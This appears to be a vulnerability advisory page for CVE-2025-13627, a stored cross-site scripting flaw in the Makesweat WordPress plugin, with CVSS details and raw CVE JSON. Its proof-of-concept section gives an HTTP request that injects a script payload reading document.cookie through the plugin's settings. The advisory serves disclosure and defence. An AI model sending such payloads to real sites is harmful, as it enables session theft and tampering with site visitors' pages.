Security Vulnerability Report
中文
CVE-2025-13627 CVSS 4.4 MEDIUM

CVE-2025-13627

Published: 2026-01-14 06:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Makesweat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'makesweat_clubid' setting in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Makesweat plugin <= 0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
POST /wp-admin/options-general.php?page=makesweat HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Cookie: [admin cookies] makesweat_clubid=<script>alert(document.cookie)</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13627", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:51.817", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Makesweat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'makesweat_clubid' setting in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Makesweat para WordPress es vulnerable a Cross-Site Scripting Almacenado a través de la configuración 'makesweat_clubid' en todas las versiones hasta la 0.1, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite a atacantes autenticados, con acceso de nivel de administrador y superior, inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://it.wordpress.org/plugins/makesweat/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/makesweat/tags/0.1/makesweat.php#L64", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/makesweat/tags/0.1/makesweat.php#L85", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/makesweat/trunk/makesweat.php#L64", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/makesweat/trunk/makesweat.php#L85", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/88dec08d-cb27-4ea8-853e-0c12dd0a6ab6?source=cve", "source": "[email protected]"}]}}